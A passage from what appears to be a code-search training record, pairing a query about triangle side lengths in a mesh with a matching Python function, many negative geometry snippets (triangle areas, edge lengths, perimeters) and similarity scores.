fontsize = 18)\n ax0.set_ylim([-uymax, uymax])\n ax0.set_xlim([-uxmax, uxmax])\n ax0.set_ylabel(r\"$u'_y$\", fontsize = 18)\n ax0.tick_params(labelsize = 14)\n # ax0.set_title(\"Gain in the u' plane\")\n\n G = map_coordinates(soln.T, np.vstack((xx, yy))) # Plot gain along observer motion\n G = G - G[-1] + 1\n 
ax1.plot(rx2, G, color = 'blue', label = \"FFT gain\")\n for caus in upcross.T[0]:\n ax1.plot([caus, caus], [-10, 1000], ls = 'dashed', color = 'black')\n ax1.plot(finx, asymG, color = 'red', label = r\"$2^{nd}$ order GO gain\")\n ax1.set_ylim(-cdist, np.max(asymG) + 1.)\n ax1.set_xlim(np.min(rx2), np.max(rx2))\n ax1.set_xlabel(r\"$u'_x$\", fontsize = 18)\n ax1.set_ylabel('G', fontsize = 18)\n # ax1.set_title(\"Slice Gain\")\n ax1.tick_params(labelsize = 14)\n ax1.grid()\n ax1.legend(loc = 1, fontsize = 14)\n\n\n # col_labels = ['Parameter', 'Value'] # Create table with parameter values\n # if np.abs(dm/pctocm) < 1:\n # dmlabel = \"{:.2E}\".format(Decimal(dm/pctocm))\n # else:\n # dmlabel = str(dm/pctocm)\n # tablevals = [[r'$d_{so} \\: (kpc)$', np.around(dso/pctocm/kpc, 2)], [r'$d_{sl} \\: (kpc)$', np.around(dsl/pctocm/kpc, 3)], [r'$a_x \\: (AU)$', np.around(ax/autocm, 3)], [r'$a_y \\: (AU)$', np.around(ay/autocm, 3)], [r'$DM_l \\: (pc \\, cm^{-3})$', dmlabel], [r\"$\\nu$ (GHz)\", f/GHz], ['Slope', np.around(m, 2)], ['Offset', n]]\n # tableax.axis('tight')\n # tableax.axis('off')\n # table = tableax.table(cellText = np.asarray(tablevals).T, colWidths = np.ones(8)*0.045, rowLabels = col_labels, loc = 'center')\n # table.auto_set_font_size(False)\n # table.set_fontsize(11)\n # table.scale(2.5, 2.5)\n \n # row_label = ['Lens shape']\n # val = [['$%s$' % sym.latex(lensf)]]\n # tableax2.axis('tight')\n # tableax2.axis('off')\n # table2 = tableax2.table(cellText=val, colWidths=[0.0015*len(sym.latex(lensf))], rowLabels=row_label, loc='top')\n # table2.auto_set_font_size(False)\n # table2.set_fontsize(12)\n # table2.scale(2.5, 2.5)\n\n grid.tight_layout(fig, pad = 1.5)\n plt.show()\n return", "def exportDT(self):\n # Filter out coordinates in the extended BBox\n coord = self.coords[4:]\n\n # Filter out triangles with any vertex in the extended BBox\n tris = [(a-4, b-4, c-4)\n for (a, b, c) in self.triangles if a > 3 and b > 3 and c > 3]\n return coord, tris" ]
[ "0.6223683", "0.6053743", "0.6050365", "0.57075876", "0.5699507", "0.56639516", "0.563397", "0.56318665", "0.56237847", "0.5588242", "0.55818903", "0.54913247", "0.5476087", "0.5466476", "0.5459577", "0.54140794", "0.53891593", "0.5373516", "0.53725284", "0.5370129", "0.5351034", "0.53492194", "0.5347101", "0.5333059", "0.5330313", "0.53092873", "0.5306608", "0.52988666", "0.5297941", "0.52961797", "0.52949", "0.52834296", "0.5283315", "0.5276761", "0.52680814", "0.5232819", "0.5225444", "0.52086216", "0.5204744", "0.5199769", "0.5196541", "0.51911426", "0.5190773", "0.5187722", "0.51843876", "0.5181303", "0.51794577", "0.51754314", "0.5170286", "0.516798", "0.51486015", "0.5146055", "0.5142659", "0.5109515", "0.50993574", "0.5098497", "0.50934595", "0.50902385", "0.5083284", "0.50797564", "0.50782317", "0.5070887", "0.5069434", "0.506923", "0.50661665", "0.50504136", "0.50479984", "0.504575", "0.50435984", "0.50343496", "0.50310904", "0.50246435", "0.50242686", "0.5024203", "0.5014532", "0.5013931", "0.5005499", "0.49993503", "0.49972594", "0.49827254", "0.49777335", "0.49757603", "0.4975548", "0.49740586", "0.4969818", "0.49666196", "0.4961869", "0.4956638", "0.49546653", "0.4951289", "0.4941841", "0.49368444", "0.49357986", "0.49335307", "0.49334747", "0.49316537", "0.4924668", "0.49205214", "0.49203542", "0.49203026" ]
0.5960203
3
Get side lengths of triangle
def get_tri_side_length(my_core, tri): side_lengths = [] s = 0 coord_list = [] verts = list(my_core.get_adjacencies(tri, 0)) for vert in verts: coords = my_core.get_coords(vert) coord_list.append(coords) for side in range(3): side_lengths.append(np.linalg.norm(coord_list[side]-coord_list[side-2])) # The indices of coord_list includes the "-2" because this way each side will be matched up with both # other sides of the triangle (IDs: (Side 0, Side 1), (Side 1, Side 2), (Side 2, Side 0)) return side_lengths
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calc_side_lengths(triangles):\n first_vec = [2, 0, 1]\n second_vec = [1, 2, 0]\n sides = triangles[:, first_vec] - triangles[:, second_vec]\n lengths = np.sqrt(np.sum(sides**2, axis=2))\n return lengths", "def get_edge_lengths(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n edges, _ = get_edges(triangles)\n return np.linalg.norm(np.diff(points[edges], axis=1), axis=2).squeeze()", "def square_triangle(sides: list) -> float:\n h_per = (sides[0] + sides[1] + sides[2]) / 2 #half-perimetr\n square = math.sqrt (h_per * (h_per- sides[0]) * (h_per - sides[1]) * (h_per - sides[2]))\n return square", "def triangle(self):\n \n R = Householder.triangle_operation(self)[0] \n \n return(R.round(10))", "def area_triangle(w, h):\n return w * h / 2", "def triangle_area(side1: number, side2: number, side3: number) -> number:\n s = (side1+side2+side3)/2\n area = sqrt(s*(s-side1)*(s-side2)*(s-side3))\n return sqrt(s*(s-side1)*(s-side2)*(s-side3))", "def triangleArea(a: Vec3, b: Vec3, c: Vec3) -> float:\n return cross3(b - a, c - a).length() / 2.0", "def area_triangle_sss(side1,side2,side3):\n semi_perim=(side1+side2+side3)/2.0\n return math.sqrt(semi_perim*\n (semi_perim - side1)*\n (semi_perim - side2)*\n (semi_perim - side3)\n )", "def area_triangle_sss(side1, side2, side3):\n \n # Use Heron's formula\n semiperim = (side1 + side2 + side3) / 2.0\n return math.sqrt(semiperim *\n (semiperim - side1) *\n (semiperim - side2) * \n (semiperim - side3))", "def triangle(self, freq: int, /) -> None:", "def sides(self):\n return len(self)", "def Lengths(self):\n\n self.__do_essential_memebers_exist__()\n\n if self.element_type == \"line\":\n coords = self.points[self.elements[:,:2],:]\n lengths = np.linalg.norm(coords[:,1,:] - coords[:,0,:],axis=1)\n else:\n # self.GetEdges()\n # coords = self.points[self.all_edges,:]\n coords = self.points[self.elements[:,:2],:]\n lengths = np.linalg.norm(coords[:,1,:] - coords[:,0,:],axis=1)\n\n return lengths", "def triangle(n):\n return n*(n+1)/2", "def getSideLength():\n side = float(input(\"How long do you want the side length?\"))\n return side", "def triangle(n):\n return (n * (n + 1)) / 2", "def getlen(self):\n if self.onlydiag():\n return self.lendiag()\n else:\n return len(self)", "def findTriangles(p):\n triangleCount = 0\n for a in range(3, p//3 + 1):\n for b in range(a+1, p//2):\n c = p - (a+b)\n if (a**2 + b**2) == c**2:\n triangleCount += 1\n return triangleCount", "def ui_input() -> list:\n print('Enter three sides of the triangle:')\n sides = [int(input()), int(input()), int(input())]\n return sides", "def lengths(self):\n lengths = []\n last = self._coordinates[-1]\n for c in self._coordinates:\n lengths.append(((c[0]-last[0])**2 + (c[1]-last[1])**2) ** 0.5)\n last = c\n return sorted(lengths)", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def triangular_area():\n print(1*1/2, 2*2/2, 3*3/2, 4*4/2, 5*5/2, 6*6/2, 7*7/2, 8*8/2, 9*9/2,\n 10*10/2)", "def triangle_area(base, height):\n return (base * height) / 2", "def len_func(polygon):\n ret=[]\n N=len(polygon)\n for i in range(1,N):\n l = ((polygon[i][0]-polygon[i-1][0])**2 + (polygon[i][1]-polygon[i-1][1])**2 )**0.5\n ret.append(l)\n l = ((polygon[0][0]-polygon[N-1][0])**2 + (polygon[0][1]-polygon[N-1][1])**2 )**0.5\n ret.append(l)\n return ret", "def area_of_a_triangle(length_1, length_2, length_3):\r\n half_perimeter = (length_1 + length_2 + length_3) / 2\r\n area = (half_perimeter * (half_perimeter-length_1) * (half_perimeter-length_2) * 
(half_perimeter-length_3)) ** 0.5\r\n return area", "def triangle(self):\n [r,c] = self.D\n m = min(r,c)\n S = self\n T = zeros(r,c)\n while m > 0:\n NoLigne = 0\n while S[NoLigne, 0] == 0 and (NoLigne < m - 1):\n NoLigne += 1\n S = S.swap(NoLigne,0)\n if S[0, 0] != 0:\n pivot = S[0,0]\n for k in range(1,m):\n if S[k,0] != 0:\n S = S.comb_lignes(pivot, -S[k,0],k,0)\n #print(\"pivot = \"+str(pivot))\n #print(\"S dans for :\")\n #print(S)\n T = T.remplace_ligned(r - m,S.F)\n #print(\"Évolution de T :\")\n #print(T)\n S = S.decoupe()\n m -= 1\n return T", "def EdgeLengths(self,which_edges='boundary'):\n\n assert self.points is not None\n assert self.element_type is not None\n\n\n lengths = None\n if which_edges == 'boundary':\n if self.edges is None:\n self.GetBoundaryEdges()\n\n edge_coords = self.points[self.edges[:,:2],:]\n lengths = np.linalg.norm(edge_coords[:,1,:] - edge_coords[:,0,:],axis=1)\n\n elif which_edges == 'all':\n if self.all_edges is None:\n self.GetEdges()\n\n edge_coords = self.points[self.all_edges[:,:2],:]\n lengths = np.linalg.norm(edge_coords[:,1,:] - edge_coords[:,0,:],axis=1)\n\n return lengths", "def triangle(n: int) -> int:\n return int(n * (n + 1) / 2)", "def get_sides(vertices):\n return [dist(vertices[1], vertices[2]),\n dist(vertices[2], vertices[0]),\n dist(vertices[0], vertices[1])]", "def triangle(a, b, c):\n longest = max(a, b, c)\n \n sum_of_others = a + b + c - longest # or min(a+b, a+c, b+c)\n \n return longest < sum_of_others", "def triangle(halfSideLength = 15, robotHeight = -90):\n# ^ \n# / \\ \n# / \\ \n# / \\ \n# /_______\\\n# \n# | a | \n# a = halfSideLength\n\n hHalf = (halfSideLength * m.sqrt(3)/2)/2\n\n posTriangle = [\n [-hHalf,halfSideLength,robotHeight,0,0,0,'mov'],\n [-hHalf,-halfSideLength,robotHeight,0,0,0,'lin'],\n [hHalf,0,robotHeight,0,0,0,'lin'],\n [-hHalf,halfSideLength,robotHeight,0,0,0,'lin'],\n [0,0,-127,0,0,0,'mov']\n ]\n\n return posTriangle", "def triangle_shape(height):\n mot = str()\n if height == 0:\n return str()\n else :\n for i in range (height):\n esp = height-1-i\n mot = mot+ esp*\" \" + (2*i+1)*\"x\" +esp*\" \"\n if i!=height-1:\n mot = mot+ \"\\n\"\n return(mot)", "def leg_length(self, *args):\n i, j = args\n return Partition(list(self)).leg_length(i-1, j-1)", "def levshape(self) -> Shape:\n return tuple(len(x) for x in self.levels)", "def triangleFunction(self):\n \n w = np.zeros((self.N))\n l = self.l\n for i in range(self.r.shape[0]):\n r = np.abs(self.r[i])\n if r <= l:\n tf = lambda r,l : 1 - r/l\n w[i] = tf(r,l)\n else:\n w[i] = 0\n self.w = w", "def length(vec):\n\n return math.sqrt(dotproduct(vec, vec))", "def length(v):\n return math.sqrt(v[0]**2 + v[1]**2)", "def length(vec):\n return vec.dot(vec)**.5", "def getLength(self):\n return self.sideLength", "def getIndividualTopLengths(self):\n nquad = self.getNumQuads()\n lengths = np.zeros(nquad)\n for i in range(nquad):\n P0, P1, P2, P3 = self._quadrilaterals[i]\n p0 = Vector.fromPoint(P0)\n p1 = Vector.fromPoint(P1)\n lengths[i] = (p1 - p0).mag() / 1000.0\n return lengths", "def triangle(length=40.0, r=3.175 / 2):\n\t# equilateral triangle:\n\ta = np.array([0, 0])\n\tb = np.array([length, 0])\n\tc = np.array([length / 2, length * math.sin(math.pi / 3)])\n\ttri_pts = PolyLine([a, b, c, a])\n\toffs_pts = addOffset(tri_pts, r)\n\ttri_pts = centerObjects(offs_pts, tri_pts)\n\treturn tri_pts, offs_pts", "def compute_triangle_area(vertices):\n v01 = vertices[0] - vertices[1]\n v02 = vertices[0] - vertices[2]\n cross_prod = np.cross(v01, v02)\n area = 0.5 * 
np.linalg.norm(cross_prod)\n return area", "def cube_area(side_length):\n area = side_length ** 3\n return area", "def _triangle_areas(self, point):\n vertex_0, vertex_1, vertex_2 = self._vertices(point)\n len_edge_12 = gs.linalg.norm((vertex_1 - vertex_2), axis=-1)\n len_edge_02 = gs.linalg.norm((vertex_0 - vertex_2), axis=-1)\n len_edge_01 = gs.linalg.norm((vertex_0 - vertex_1), axis=-1)\n half_perimeter = 0.5 * (len_edge_12 + len_edge_02 + len_edge_01)\n return gs.sqrt(\n (\n half_perimeter\n * (half_perimeter - len_edge_12)\n * (half_perimeter - len_edge_02)\n * (half_perimeter - len_edge_01)\n ).clip(min=1e-6)\n )", "def triangle_edges(length=2.0, divisions=4)):\n\n def _edges_from_triangle(triangle):\n a, b, c = triangle\n return [(a, b), (b, c), (c, a)]\n\n vertices, facets = triangle_facets(length, divisions)\n edges = []\n for facet in facets:\n edges.extend(_edges_from_triangle(facet))\n return vertices, edges", "def get_length_hexagon():\n length = float(input(\"What is the side length of the hexagon?\"))\n return length", "def euclidian_length(self):\n\n if self.get_len() > 1:\n shape_length = 0\n last_x = self.x\n last_y = self.y\n scale = [0]\n for i in range(self.len - 2):\n x = np.array(self.x[i + 1])\n y = np.array(self.y[i + 1])\n last_x = np.array(self.x[i])\n last_y = np.array(self.y[i])\n shape_length += np.sqrt((x - last_x) ** 2 + (y - last_y) ** 2)\n scale.append(shape_length)\n return shape_length, scale\n\n else:\n return 0, [0]", "def test_get_triangle_area():\n v1 = (0,0); v2 = (1,0); v3 = (0,2)\n verticies = [v1,v2,v3]\n expected = 1\n computed = get_triangle_area(verticies)\n tol = 1E-14\n success = abs(expected-computed) < tol\n msg = 'computed area={} != {} (expected)'.format(computed,expected)\n assert success,msg", "def triangle(p1, p2, p3, width, height):\r\n v1 = vec2(round(p1.x), round(p1.y))\r\n v2 = vec2(round(p2.x), round(p2.y))\r\n v3 = vec2(round(p3.x), round(p3.y))\r\n if (v1.y > v2.y):\r\n temp = v1\r\n v1 = v2\r\n v2 = temp\r\n if (v1.y > v3.y):\r\n temp = v1\r\n v1 = v3\r\n v3 = temp\r\n if (v2.y > v3.y):\r\n temp = v2\r\n v2 = v3\r\n v3 = temp\r\n if (v1.y != v2.y): k_12 = (v2.x - v1.x)/(v2.y - v1.y)\r\n if (v1.y != v3.y): k_13 = (v3.x - v1.x)/(v3.y - v1.y)\r\n if (v2.y != v3.y): k_23 = (v3.x - v2.x)/(v3.y - v2.y)\r\n if (v1.y == v2.y):\r\n if (v1.x < v2.x):\r\n xl, xu = v1.x, v2.x\r\n left = False\r\n else:\r\n xl, xu = v2.x, v1.x\r\n left = True\r\n if (v1.y >= 0 and v1.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v1.y)\r\n else:\r\n left = v2.x < k_13*(v2.y - v1.y) + v1.x\r\n if (left):\r\n k1, k2 = k_12, k_13\r\n else:\r\n k1, k2 = k_13, k_12\r\n yl = max(v1.y, 0)\r\n yu = min(v2.y, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - v1.y) + v1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - v1.y) + v1.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)\r\n if (v2.y == v3.y):\r\n if (v2.x < v3.x):\r\n xl, xu = v2.x, v3.x\r\n else:\r\n xl, xu = v3.x, v2.x\r\n if (v2.y >= 0 and v2.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v2.y)\r\n else:\r\n if (left):\r\n k1, k2 = k_23, k_13\r\n t1, t2 = v2, v1\r\n else:\r\n k1, k2 = k_13, k_23\r\n t1, t2 = v1, v2\r\n yl = max(v2.y, 0)\r\n yu = min(v3.y + 1, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - t1.y) + t1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - t2.y) + t2.x + 0.5), width - 1)\r\n for x in range(xl, xu + 
1):\r\n yield vec2(x, y)", "def validate_triangle(sides: list) -> bool:\n\n if 0 in sides:\n return False\n if sum(sides[:2]) < sides[2]\\\n or sum([sides[0], sides[2]]) < sides[1]\\\n or sum(sides[1:]) < sides[0]:\n return False\n return True", "def triangleArea(p0, p1, p2):\n return 0.5 * (\n -p1[1] * p2[0]\n + p0[1] * (-p1[0] + p2[0])\n + p0[0] * (p1[1] - p2[1])\n + p1[0] * p2[1]\n )", "def triangle_number(n):\n return n * (n + 1) / 2", "def triangle(t, s, l, l2):\n\tan = 360/s\n\tang = (180 - an)/2\n\tfor i in range (3):\n\t\tif i%2 == 0:\n\t\t\tfd(t, l2)\n\t\telse:\n\t\t\tfd(t, l)\n\t\tlt(t, 180 - ang)\n\tlt (t, ang)", "def polyline_length(pts):\n total_length = 0\n p0 = Point(pts[0])\n for p in pts[1:]:\n p1 = Point(p)\n total_length += p0.distance_to(p1)\n p0 = p1\n return total_length", "def length(vector):\n a, b, c = vector\n return math.sqrt(a ** 2 + b ** 2 + c ** 2)", "def length(self):\n points = [Point(v, crs=self.crs) for v in self.vertices]\n distances = [a.distance(b) for a, b in zip(points[:-1], points[1:])]\n return sum(distances)", "def slope_bricks_per_level_per_side(side_length):\n # Get the number of 4x2 slope bricks needed.\n four_brick_count = int(side_length / 4)\n remainder_bricks = side_length % 4 if side_length > 0 else 0\n # Calculate the remainder bricks you need.\n remainder_two_bricks = 1 if remainder_bricks > 1 else 0\n remainder_one_bricks = remainder_bricks % 2\n return four_brick_count, remainder_two_bricks, remainder_one_bricks", "def area_triangle(triangle):\n return 0.5 * length_vector(normal_triangle(triangle, False))", "def yield_right_isosceles_triangles(cls):\n for i in range(1, 142):\n yield 1 * i, 1 * i, sqrt(2) * i", "def perimeter(self):\n return (\n self.side_1_length +\n self.side_2_length +\n self.side_3_length +\n self.side_4_length\n )", "def perimeter(self):\n return sum([s.length for s in self.segments])", "def get_pathlengths(inp, origin, wires):\n\n lengths = np.full(wires.shape, fill_value=np.inf) # shape (2, posx, posy), float for inf sentinel\n lengths[:, origin[0], origin[1]] = 0\n for i,line in enumerate(inp.splitlines()):\n pos = origin.copy()\n pathlen = 0\n for word in line.split(','):\n dir,length = word[0], int(word[1:])\n l = np.arange(1, length + 1)\n # need min(...) 
for masking, hence inf sentinel\n if dir == 'R':\n lengths[i, pos[0] + l, pos[1] + 0*l] = np.minimum(l + pathlen, lengths[i, pos[0] + l, pos[1] + 0*l])\n pos += [length, 0]\n if dir == 'L':\n lengths[i, pos[0] - l, pos[1] + 0*l] = np.minimum(l + pathlen, lengths[i, pos[0] - l, pos[1] + 0*l])\n pos += [-length, 0]\n if dir == 'U':\n lengths[i, pos[0] + 0*l, pos[1] + l] = np.minimum(l + pathlen, lengths[i, pos[0] + 0*l, pos[1] + l])\n pos += [0, length]\n if dir == 'D':\n lengths[i, pos[0] + 0*l, pos[1] - l] = np.minimum(l + pathlen, lengths[i, pos[0] + 0*l, pos[1] - l])\n pos += [0, -length]\n pathlen += length\n\n # unmask, return int array of paths\n lengths[np.isinf(lengths)] = -1\n return lengths.astype(np.uint8)", "def triangle_number(n):\n return n * (n + 1) // 2", "def get_triangles_per_vertex(my_core, native_ranges):\n\n t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)", "def tf_box_3d_diagonal_length(boxes_3d):\n\n lengths_sqr = tf.square(boxes_3d[:, 3])\n width_sqr = tf.square(boxes_3d[:, 4])\n height_sqr = tf.square(boxes_3d[:, 5])\n\n lwh_sqr_sums = lengths_sqr + width_sqr + height_sqr\n diagonals = tf.sqrt(lwh_sqr_sums)\n\n return diagonals", "def perimeter(self):\n return self.sidelength1 + self.sidelength2 + self.baselength1 + self.baselength2", "def ss_triangle_count(graph: ScipyGraph) -> int:\n props = ScipyGraph.Type.compute_abstract_properties(graph, {\"edge_type\"})\n if props[\"edge_type\"] == \"map\":\n # Drop weights before performing triangle count\n m = graph.value.copy()\n m.data = np.ones_like(m.data)\n elif props[\"edge_type\"] == \"set\":\n m = graph.value\n L = ss.tril(m, k=-1).tocsr()\n U = ss.triu(m, k=1).tocsc()\n return int((L @ U.T).multiply(L).sum())", "def triArea(base,height):\n return base * height /2", "def get_triangle_numbers(n):\n r = []\n for i in xrange(1, n + 1):\n t = ((i * (i + 1)) / 2)\n r.append(t)\n return r", "def corner_half_length(a, b):\n x = (a - b) / (a + b)\n return pi / 8 * (a + b) * (\n 1 + 3 * x ** 2 / (10 + sqrt(4 - 3 * x ** 2)))", "def arm_length(self, *args):\n i, j = args\n return Partition(list(self)).arm_length(i-1, j-1)", "def length(self):\n return math.sqrt(self.x**2 + self.y**2 + self.z**2)", "def length(self):\n return math.sqrt(self.x * self.x + self.y * self.y)", "def _upward_triangle_indicies(height=3):\n return [(height-r,c) for r in range(height) for c in range(-abs(r),abs(r)+1)]", "def std_triangles_count(graph):\n if nx.is_directed(graph):\n raise Exception(\"Graph is not undirected\")\n\n return sum(nx.triangles(graph).values()) // 3", "def veclength(vec):\n vec = np.array(vec, copy=False).reshape(-1, 3)\n return np.sqrt(np.einsum('ij,ij->i', vec, vec))", "def length(vec):\n return np.linalg.norm(vec)", "def aireTriangle(b, h):\n return (b * h) / 2", "def triangle_areas(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n xy = points[triangles]\n # s1 = xy[:, 2, :] - xy[:, 1, :]\n # s2 = xy[:, 0, :] - xy[:, 2, :]\n # s3 = xy[:, 1, :] - xy[:, 0, :]\n # which can be simplified to\n # s = xy[:, [2, 0, 1]] - xy[:, [1, 2, 0]] # 3D\n s = xy[:, [2, 0]] - xy[:, [1, 2]] # 2D\n a = np.linalg.det(s)\n return a * 0.5", "def get_max_length_diff_in_quad(points):\n leftmost, uppermost, rightmost, bottommost = (points[0, 0] for i in range(4))\n for point in points:\n x = point[0, 0]\n y = point[0, 1]\n if x < leftmost[0]:\n # Point is located on the left side of leftmost point\n 
leftmost = point[0]\n elif x > rightmost[0]:\n rightmost = point[0]\n elif y < uppermost[1]:\n uppermost = point[0]\n elif y > bottommost[1]:\n bottommost = point[0]\n\n length_diff = [cv2.norm(uppermost - leftmost),\n cv2.norm(rightmost - uppermost),\n cv2.norm(bottommost - rightmost),\n cv2.norm(leftmost - bottommost)]\n return np.max(length_diff)", "def linelength(l):\n return dist(l[0],l[1])", "def length(self):\n return math.sqrt(\n (self.endpoint_a.northing - self.endpoint_b.northing) ** 2 +\n (self.endpoint_a.easting - self.endpoint_b.easting) ** 2\n )", "def office_get_quadratic_steplength(parser, args, params):\n parser.add_argument('p1x', metavar='p1x', type=float, nargs=1)\n parser.add_argument('p1y', metavar='p1y', type=float, nargs=1)\n parser.add_argument('p2x', metavar='p2x', type=float, nargs=1) \n parser.add_argument('p2y', metavar='p2y', type=float, nargs=1) \n parser.add_argument('p3x', metavar='p3x', type=float, nargs=1) \n parser.add_argument('p3y', metavar='p3y', type=float, nargs=1) \n \n local_args = parser.parse_known_args(args[1:])\n p1 = local_args[0].p1x[0]\n m1 = local_args[0].p1y[0]\n p2 = local_args[0].p2x[0]\n m2 = local_args[0].p2y[0]\n p3 = local_args[0].p3x[0]\n m3 = local_args[0].p3y[0]\n \n control.get_quadratic_steplength(p1, m1, p2, m2, p3, m3)", "def len(self):\n return math.sqrt(self.v[0] * self.v[0] + self.v[1] * self.v[1])", "def get_sides_count(self):\r\n return self.__sides_count", "def area_triangle_three_sides(side1: float, side2: float, side3: float) -> float:\r\n if side1 < 0 or side2 < 0 or side3 < 0:\r\n raise ValueError(\"area_triangle_three_sides() only accepts non-negative values\")\r\n elif side1 + side2 < side3 or side1 + side3 < side2 or side2 + side3 < side1:\r\n raise ValueError(\"Given three sides do not form a triangle\")\r\n semi_perimeter = (side1 + side2 + side3) / 2\r\n area = sqrt(\r\n semi_perimeter\r\n * (semi_perimeter - side1)\r\n * (semi_perimeter - side2)\r\n * (semi_perimeter - side3)\r\n )\r\n return area", "def __init__(self, lengths):\n if len(set(lengths)) > 2:\n raise ValueError(\"This is not an isosceles triangle.\")\n super().__init__(lengths)", "def rightTriangle():\n size = int(input('Enter the size: '))\n print('Right triangle of size', size)\n pass", "def test_triangle_count_04(self):\n body = {\"direction\": \"OUT\"}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def get_triangle_count(remote, objectid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleCount(objectid)\n remote.runCommand(cmd1)\n result_val = mmapi.any_result()\n cmd1.GetSceneCommandResult_GetTriangleCount(key1, result_val)\n return result_val.i", "def vec_len(x):\r\n \r\n length = math.sqrt(x[0]**2 + x[1]**2)\r\n return length", "def __getSideLength(self, width, height):\n\n # Get screen size from config file.\n with open(\"config.txt\") as f:\n config = json.loads(f.read())\n\n tileWidth = config[\"screenWidth\"]\n tileHeight = config[\"screenHeight\"]\n\n # Get max tile height and width.\n tileHeight = math.floor(tileHeight / (height+2))\n tileWidth = math.floor(tileWidth / (width+2))\n\n # Get the smallest of the two so the tile can be square.\n if tileHeight > tileWidth:\n sideLength = tileWidth\n else:\n sideLength = tileHeight\n\n return sideLength", "def length(a, b):\n return sqrt((a[0] - b[0]) * (a[0] 
- b[0]) + (a[1] - b[1]) * (a[1] - b[1]))", "def create_two_init_triangles(points):\n return [(points[0], points[1], points[2]),\n (points[0], points[2], points[3])]", "def compute_triangle_side_centroid_distances(triangle_points: np.ndarray) -> np.ndarray:\n\n def distance_point_line(point, p1, p2):\n norm_p2_p1 = norm(p2 - p1)\n norm_p2_p1 = norm_p2_p1 if norm(p2 - p1) != 0 else np.finfo(float).eps\n d = np.abs(norm(np.cross(p2 - p1, p1 - point))) / norm_p2_p1\n return d\n\n (x1, y1), (x2, y2), (x3, y3) = unpack_triangle_coordinates(triangle_points)\n # Centroid\n centroid = (((x1 + x2 + x3) / 3), ((y1 + y2 + y3) / 3))\n relative_centroid_1_2 = distance_point_line(np.array(centroid), np.array([x1, y1]), np.array([x2, y2]))\n relative_centroid_2_3 = distance_point_line(np.array(centroid), np.array([x2, y2]), np.array([x3, y3]))\n relative_centroid_3_1 = distance_point_line(np.array(centroid), np.array([x3, y3]), np.array([x1, y1]))\n centroid_distances_to_sides = np.array([relative_centroid_1_2, relative_centroid_2_3, relative_centroid_3_1])\n return centroid_distances_to_sides", "def test_right_triangle(self):\n self.assertEqual(classify_triangle(3, 4, 5), 'Right Scalene')\n self.assertEqual(classify_triangle(10, 6, 8), 'Right Scalene')\n self.assertEqual(classify_triangle(24, 25, 7), 'Right Scalene')\n\n self.assertEqual(classify_triangle(5, 5, 7.07106781187), 'Right Isosceles')\n self.assertEqual(classify_triangle(8, 11.313708499, 8), 'Right Isosceles')\n self.assertEqual(classify_triangle(14.1421356237, 10, 10), 'Right Isosceles')", "def calc_half_perimeter(self, source, sinks):\n deltax = 0\n deltay = 0\n assert self.cells[source].x in range(self.nx) and self.cells[source].y in range(self.ny)\n for sink in sinks:\n assert self.cells[sink].x in range(self.nx) and self.cells[sink].y in range(self.ny)\n dx = abs(self.cells[source].x - self.cells[sink].x)\n if dx > deltax:\n deltax = dx\n dy = abs(self.cells[source].y - self.cells[sink].y)\n if dy > deltay:\n deltay = dy\n return deltax + deltay", "def test_triangle(self):\n result = shape_area.triangle_area(10,5)\n self.assertEqual(result,25)", "def length(first):\n if isinstance(first,FreeCAD.Vector):\n return math.sqrt(first.x*first.x + first.y*first.y + first.z*first.z)", "def triangleNumber(n):\n return sum(range(n+1))", "def left_right(steps):\n lengths = lens(steps)\n a_side = []\n b_side = []\n for i in range(len(lengths)):\n if i % 2 == 0:\n a_side.append(steps[i])\n else:\n b_side.append(steps[i])\n return a_side, b_side" ]
[ "0.80329156", "0.73527324", "0.6605369", "0.6578953", "0.653027", "0.6457566", "0.6410448", "0.6380816", "0.6373851", "0.634458", "0.63425255", "0.62799424", "0.62611526", "0.62526083", "0.6235124", "0.6221507", "0.62141633", "0.61444443", "0.6128147", "0.61095893", "0.6104889", "0.60801274", "0.60788375", "0.6071254", "0.6066173", "0.6061882", "0.6059281", "0.60473496", "0.6004745", "0.60017395", "0.59889114", "0.5988143", "0.598015", "0.5976947", "0.59591794", "0.5957949", "0.5957245", "0.5934963", "0.592395", "0.5921473", "0.5920306", "0.5881472", "0.5875542", "0.5863185", "0.58588773", "0.58505327", "0.5813216", "0.5797877", "0.5797807", "0.57945967", "0.57926863", "0.5790133", "0.5778775", "0.577796", "0.5773677", "0.5772126", "0.5770336", "0.576594", "0.57576907", "0.5756743", "0.57511646", "0.57387054", "0.5733718", "0.572957", "0.57272464", "0.570798", "0.5701886", "0.5695867", "0.568324", "0.5682328", "0.56814665", "0.5667389", "0.56639093", "0.56343293", "0.5629091", "0.5626556", "0.5625807", "0.5605063", "0.5601235", "0.5599026", "0.55987084", "0.5586779", "0.55850834", "0.5583209", "0.55782783", "0.55723053", "0.5569269", "0.5560475", "0.5557526", "0.5553606", "0.55532056", "0.5543838", "0.55387545", "0.5535224", "0.5528026", "0.5527881", "0.5522822", "0.55145013", "0.55095327", "0.550904" ]
0.7491572
1
Get the coarseness of area. Coarseness is calculated by dividing surface area of a surface by number of triangles in that surface. inputs
